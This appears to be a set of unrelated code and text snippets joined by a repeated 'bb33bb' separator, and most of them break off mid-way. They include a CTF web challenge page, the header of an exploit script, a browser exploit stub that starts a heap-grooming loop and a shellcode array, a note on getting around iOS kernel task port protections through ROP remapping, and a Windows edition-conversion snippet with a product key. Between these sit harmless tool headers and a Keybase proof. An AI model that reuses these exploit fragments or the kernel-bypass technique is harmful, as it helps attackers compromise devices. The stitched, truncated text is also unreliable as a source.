bb33bb

<!DOCTYPE html>
	<html>
	<head>
		<title>Pwn2Win | MessageKeeper</title>
	</head>
	<body>
		<script>
			let alphabet = "0123456789abcdef";

			const sleep = (ms) => {

bb33bb

import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

bb33bb

## Find Available Target Editions
DISM.exe /Online /Get-TargetEditions

## Convert Server Standard 2019 Evaluation to Server Standard 2019
DISM /online /Set-Edition:ServerStandard /ProductKey:N69G4-B89J2-4G8F4-WWYCC-J464C /AcceptEula

## How To Activate 
slmgr /ipk XXXXX-XXXXX-XXXXX-XXXXX-XXXXX
slmgr /skms [server]:[port]
slmgr /ato

bb33bb

<script>
    function gc() {
        for (var i = 0; i < 0x80000; ++i) {
            var a = new ArrayBuffer();
        }
    }

let shellcode = [

// Move x18 to x28 (TEB)

bb33bb

/*
 * t2048.c - 2048 for some TI calculators
 *
 * Copyright (c) 2014 Siguza
 *
 * Tested on TI-89 Titanium only. According to headers, it should work on TI-92 and Voyage 200 as well, but no promises.
 * To be compiled with ti-gcc - as far as I remember, TI's own C compiler can't handle this.
 *
 * Licensed under MIT, i.e. feel free to use and redistribute at will, but I'd appreciate some credit. :)
 */

bb33bb

/*
 * img3ex.c - Extract Img3 files from any binary blob, e.g. a /dev/disk* dump.
 *
 * Placed in the Public Domain, do whatever you want with it. No warranty of any kind.
 *
 * Compile with: cc -o img3ex -std=c11 -Wall -O3 img3ex.c
 */

#include <errno.h>              // errno
#include <fcntl.h>              // open, O_RDONLY

bb33bb

Moved here: https://github.com/Siguza/ios-build/blob/master/libimobiledevice/build.sh

bb33bb

Keybase proof

I hereby claim:

• I am Siguza on github.
• I am siguza (https://keybase.io/siguza) on keybase.
• I have a public key whose fingerprint is 6393 3A9D E301 7C59 ADE5 3EBB 1591 E8CA 0BCA 036F

To claim this, I am signing this object:

bb33bb

Sadly I don't have a dev device on iOS 10, but for anyone playing around with zIVA caring about the kernel task port:

Starting with iOS 10.3 (and macOS 10.12.4), Apple changed convert_port_to_locked_task (and a few other port-to-something conversion functions) to blacklist the kernel task by means of a direct check. As a result, you can still obtain the kernel task port, but almost all APIs will simply treat it like MACH_PORT_NULL, thus rendering it useless. The check is a simple pointer comparison though, so it can be circumvented by just remapping the task struct at an additional virtual address and creating a new port from that with a ROP equivalent of:

vm_map_remap(
    kernel_map,
    &remap_addr,
    sizeof(task_t),
    0,

VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR,

bb33bb

// Siguza
// Treat as public domain.

#include <ctype.h>              // isspace
#include <stdlib.h>             // malloc, free,
#include <string.h>             // strlen, strncmp, strstr

// Turn delimiter tokens into null terminators and
// create array of pointers to each new string.
static void destructive_split(char *str, const char *delim, char ***out, size_t *outlen)